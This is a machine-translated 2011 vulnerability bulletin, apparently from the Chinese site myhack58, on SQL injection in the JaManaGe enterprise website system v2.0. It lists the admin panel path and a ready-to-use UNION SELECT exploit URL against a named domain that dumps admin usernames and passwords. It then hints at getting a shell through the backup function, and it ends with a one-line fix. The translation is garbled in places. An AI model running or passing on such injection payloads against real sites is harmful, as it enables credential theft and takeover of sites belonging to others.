JaManaGe enterprise built Station system v2. 0 injection vulnerability and fix-vulnerability warning-the black bar safety net

2011-06-13T00:00:00
ID MYHACK58:62201130848
Type myhack58
Reporter 佚名
Modified 2011-06-13T00:00:00

Description

By:Mr. DzY

aManaGe the enterprise built Station system with perfect enterprise website background management functions, can through the background simple operation to achieve a large amount of information updated. Finished

Good system, products, news, talent, and customer service features and more to make your business convenient for online office. Universal background management functions more convenient.

From the corporate web site management, we provide comprehensive online technical support. Let you with gratification.

后台 :admin/admin.htm

exp:

http://www.badguest.cn/ShowNews.asp?id=42 union select 1,admin,password,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6 from manager

Individual is 1 0 a field.

Get the shell is very simple,the background there is a backup. Will not say.............、

Fix: the filter id parameter